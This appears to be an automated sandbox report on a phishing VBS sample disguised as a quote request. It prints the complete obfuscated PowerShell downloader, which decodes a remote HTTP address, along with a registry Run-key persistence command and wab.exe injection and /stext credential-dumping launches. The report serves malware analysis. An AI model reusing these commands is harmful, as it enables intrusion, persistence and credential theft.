              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,26_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00401806 NtdllDefWindowProc_W,26_2_00401806
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_004018C0 NtdllDefWindowProc_W,26_2_004018C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004016FD NtdllDefWindowProc_A,27_2_004016FD
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004017B7 NtdllDefWindowProc_A,27_2_004017B7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00402CAC NtdllDefWindowProc_A,28_2_00402CAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00402D66 NtdllDefWindowProc_A,28_2_00402D66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC3AB1A611_2_00007FFAAC3AB1A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC3ABF5211_2_00007FFAAC3ABF52
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFAAC3A0EF511_2_00007FFAAC3A0EF5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044B04026_2_0044B040
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0043610D26_2_0043610D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044731026_2_00447310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044A49026_2_0044A490
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040755A26_2_0040755A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0043C56026_2_0043C560
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044B61026_2_0044B610
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044D6C026_2_0044D6C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_004476F026_2_004476F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044B87026_2_0044B870
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044081D26_2_0044081D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0041495726_2_00414957
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_004079EE26_2_004079EE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00407AEB26_2_00407AEB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044AA8026_2_0044AA80
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00412AA926_2_00412AA9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00404B7426_2_00404B74
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00404B0326_2_00404B03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0044BBD826_2_0044BBD8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00404BE526_2_00404BE5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00404C7626_2_00404C76
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00415CFE26_2_00415CFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00416D7226_2_00416D72
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00446D3026_2_00446D30
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00446D8B26_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00406E8F26_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0040503827_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0041208C27_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004050A927_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0040511A27_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0043C13A27_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004051AB27_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0044930027_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0040D32227_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0044A4F027_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0043A5AB27_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0041363127_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0044669027_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0044A73027_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004398D827_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_004498E027_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0044A88627_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0043DA0927_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00438D5E27_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00449ED027_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_0041FE8327_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_00430F5427_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_004050C228_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_004014AB28_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_0040513328_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_004051A428_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_0040124628_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_0040CA4628_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_0040523528_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_004032C828_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_0040168928_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00402F6028_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: RFQ.NO. S70-23Q-1474-CS-P.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
              Source: amsi32_4784.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5768, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@25/320@2/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,26_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 28_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,28_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,26_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,26_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,26_2_0040B58D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Unpredictableness.NegJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSU
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e13p3ojw.iz2.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5768
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4784
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 0000001A.00000002.1937634893.0000000005122000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000001A.00000003.1932201767.0000000004C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_27-33247
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ.NO. S70-23Q-1474-CS-P.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Naergaaende" /t REG_EXPAND_SZ /d "%Trkkerdrengens% -w 1 $Tenementize=(Get-ItemProperty -Path 'HKCU:\Wabbles\').Erende29;%Trkkerdrengens% ($Tenementize)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hfdhdzluzzdkgnfkwvintwxsscifq"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rzjadswnvivpittonfdpwjkbajsojzmco"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bbote"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Typhoids213 = 1;$Atrible='Substrin';$Atrible+='g';Function Noncolloid($Offtype){$Focalisation=$Offtype.Length-$Typhoids213;For($Halmknipperne183=6; $Halmknipperne183 -lt $Focalisation; $Halmknipperne183+=(7)){$Eksistensberettigelsers+=$Offtype.$Atrible.Invoke($Halmknipperne183, $Typhoids213);}$Eksistensberettigelsers;}function Skruegangen($Epileptikere){. ($Slagfjedres) ($Epileptikere);}$Totalsaneringens=Noncolloid 'OenophMUnesseoMa,lesz Fastli C,amolRelatil Pud.na F.lmk/Hem el5 Bakk..Ensign0Hepato Lr.rk(feasinWUddriviHalvpunLaanendBltedyoPopulaw pectrsfly,as St alvNIndladTDiapha Kampv1Sygele0Duv,ty.Smaate0T rgiv; Finge So,eneWPokerfiLudd rn elvov6Unwins4Produk;Gastro arylaxD.pped6Bl ker4T veaa;nonval prinrBovensv En ag:Ce.ser1 Bldg.2Coelio1 Sterr.Sellaa0Foreto)Svange LogikpGSub,tieNyhedscOv,ryekMiljstoPan li/Horome2D.ctyl0Wordst1Skibsb0 Vajen0Cascab1 Chubb0 lands1 edest Tsil.F.igsstiDataber Portee Tje efBlendaoBabs nx raspe/Subpet1 ,alst2Ytterp1Terr.s.Append0Datalo ';$Fewterer=Noncolloid 'OutpouUSam ens FinebeValgkarndring-Museo,At.tradgEndagse DriftnconveytH skwo ';$Onomatological=Noncolloid ' Dor khReforgtDepicttGrnsevp Skatt:La,ish/Signal/Egebr.8Flanne7Re.sbg.Garden1fluoar2I.sera1Ov rta.folioa1forret0Vejrud5 galip.Jockey1Alpeho8Overme4Tilfrs/Kil,brFVandreoFusiondKlinkeg Gulvmn ,caphgLipolyeBlkketrMilliboPolya,vstiknaeEristirLandingModbydaBlokf nSubu bgForvalsEncykl.CecostpDentalrBaconimBrordt ';$Raastofforbrugets=Noncolloid 'Tyrann>Erythr ';$Slagfjedres=Noncolloid 'Philosi GlatieVejby xPorch ';$Chlor = Noncolloid ' Rei.seOvnopocKlassihPretaroFael,e Pontif%BoltelaLich.ipValderpL.parodchordaastudeotChefkaaStdfan% Reage\Kom unU Bedfon K,rnipCat.clr.tvrkeeIllapsd TelluiTelephc,ecramtMaalesa.koldnbMehtarl BoheaeByeno,nMalajae Sj.eds F.rbisSermon.kat lyN roteae,etribgCocard Senso.& Abais&Centra TaktikePhot ccskoggehBibelloPhrase Tartuf$pensio ';Skruegangen (Noncolloid 'Skrive$VerdengVomitolLo ninoNonap.bPhraseaFremtilTirriv:NashveS utoyecHurricoSta meuHove arSteno,eMiseresKaritasGodk n=Unburl(Skamskctil,ifmRoyen dNicoti trat/Capablc Splej Timber$TrojkaCKarburh San,rlTreatmo ArtigrKaol,n)Hjkant ');Skruegangen (Noncolloid 'Or,cul$TekstsgIntolelIrett.o Proscb urisda Nonsyl Tyksa:Saf.naTFitc eoOverafpcorrivs MyelolV nfrb=Thespi$BispegOPlo.tenTvehuno.fordem ,aareaUdvandt upersoDik malZuccheoDrejefgParaffiKollidc Afv.saBarytolReklip.Ma lassOmkrsepAfslutlUdludeitid,antudkast(Counte$UddannRgallywaVar.tgaU sletsDoubletSonovooFrdselfTales fDosernoMisdicrUdkli,bf,stprrSpirituReconggOverbaeUninsutPlankssakkvis)Anther ');$Onomatological=$Topsl[0];Skruegangen (Noncolloid 'Photoc$Endop.gBreithlTredivo,tikhvbBe kataRug,ndlPhonsc:Menn.sIRotatis RibieoStaalhtCudgeloS,rupgpHepatoeEch nosRoyalt=GeorgiN In.daeHylarcwS.akor-Tils,dOFo vikbCarancjHalloieWallflcHylop tDisagr AfhngiSOverbeyafmontsFi,bett Mic,ieTruantm Adelh.Exc.llNMaskineDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Unpredictableness.Neg && echo $"Jump to behavior
